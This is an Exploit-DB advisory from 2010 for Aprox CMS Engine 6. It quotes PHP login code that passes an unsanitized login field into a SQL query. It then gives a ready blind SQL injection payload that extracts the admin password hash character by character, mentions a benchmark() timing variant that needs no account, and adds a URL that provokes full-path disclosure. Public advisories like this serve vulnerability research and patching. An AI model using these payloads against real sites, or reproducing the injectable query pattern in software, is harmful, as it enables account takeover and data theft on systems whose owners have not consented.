Aprox CMS Engine 6.0 - Multiple Vulnerabilities

ID EDB-ID:15198
Type exploitdb
Reporter Stephan Sattler
Modified 2010-10-03T00:00:00


Aprox CMS Engine V6 Multiple Vulnerabilities. Webapps exploit for php platform

                                            # Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities
# Date: 03.10.2010
# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.aprox.de/
# Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6
# Version: 6
[ Vulnerability 1]

# Vulnerable Code:

sql_login.inc line 63-91

	if (isset($_GET["action"]) && ($_GET["action"] != "")){$action = $_GET["action"];}
	if (isset($_POST["password"]) && ($_POST["password"] != "")){$password = md5($_POST["password"]);}
	if (isset($_POST["login"]) && ($_POST["login"] != "")){$login = $_POST["login"];}

if (($login=="") or ($password=="")) {echo "Angegeben nicht vollständig!";die;}

$db = mysql_connect(serverhost, user, pass, database);
$abfrage = "select * from ". suffix ."users where login = '$login'";
$res = mysql_db_query(database,  "$abfrage");

$num = mysql_num_rows($res);
#echo $num;
if ($num >0)
#echo "user gefunden,<br>";
$pass = mysql_result($res, 0, 'password');
if ($password == $pass) 
echo "Alles OK!!!";
$name = mysql_result($res, 0, 'real_name');

$_SESSION["name"] = $name;
$_SESSION["login"] = $login;
$_SESSION["pass"] = $pass;

$login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied');
$_SESSION["gepruefter_user"] = $login_gepruefter_user;


# Explanation:

$_POST["login"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.

# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/index.php?page=sql_login

Postdata(Example for the admin user which is created after install):

login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login

->if login succeeds, the first character of the hash is greater than d(ascii 100).

An attacker can insert his/her own login credentials and test it with them or do it with benchmark() without a user-account.
Aprox stores failed logins in a Session so this won't prevent an attack.

[Vulnerability 2]

# Path Disclosure

For Example: http://[site]/[path]/index.php?id=1 AnD 1=1 
will provoke an error so the full path will be presented to you.